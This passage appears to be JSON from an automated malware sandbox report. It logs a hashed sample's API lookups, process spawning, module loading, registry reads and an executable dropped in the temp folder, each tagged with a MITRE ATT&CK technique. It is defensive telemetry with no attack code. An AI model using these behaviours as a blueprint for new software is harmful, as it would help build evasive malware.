\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005772)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da592e76@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"130014008e5a2e76@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e626a@ADVAPI32.dll\"\n \"0e000f00703f626a@ADVAPI32.dll\"\n \"0e000f00cc3f626a@ADVAPI32.dll\"\n \"11001200b447626a@ADVAPI32.dll\"\n \"110012004848626a@ADVAPI32.dll\"\n \"120013008c48626a@ADVAPI32.dll\"\n \"12001300e448626a@ADVAPI32.dll\"\n \"14001500386e626a@ADVAPI32.dll\"\n \"14001500506e626a@ADVAPI32.dll\"\n \"14001500686e626a@ADVAPI32.dll\"\n \"17001800806e626a@ADVAPI32.dll\"\n \"0d000e00986e626a@ADVAPI32.dll\"\n \"11001200a86e626a@ADVAPI32.dll\"\n \"11001200bc6e626a@ADVAPI32.dll\"\n \"0d000e004466626a@WININET.dll\"\n \"0d000e00b466626a@WININET.dll\"\n \"10001100ec66626a@WININET.dll\"\n \"100011009067626a@WININET.dll\"\n \"10001100006f626a@WININET.dll\"\n \"10001100146f626a@WININET.dll\"\n \"14001500286f626a@WININET.dll\"\n \"14001500406f626a@WININET.dll\"\n \"12001300586f626a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"CreateProcessW\" with parameter \":*C:\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe *\" - (UID: 00000000-00005772)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZUSRVG\" - (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 754d0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 754d0000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75360000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 778c0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 764f0000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75640000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6ff90000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75910000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 76350000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70b30000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 75a40000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b3b0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006064)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has an writable section named \".data\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has an writable section named \".bss\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has an writable section named \".idata\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has an writable section named \".CRT\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has an writable section named \".tls\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d ...\" (UID: 00000000-00005784)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUSRVG\" (UID: 00000000-00006064)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d ...\" (UID: 00000000-00005784)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUSRVG\" (UID: 00000000-00006064)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" was detected as \"MinGW\" and name: \"Compiler\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00006064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" reads file \"c:\\c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\version.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" trying to touch file 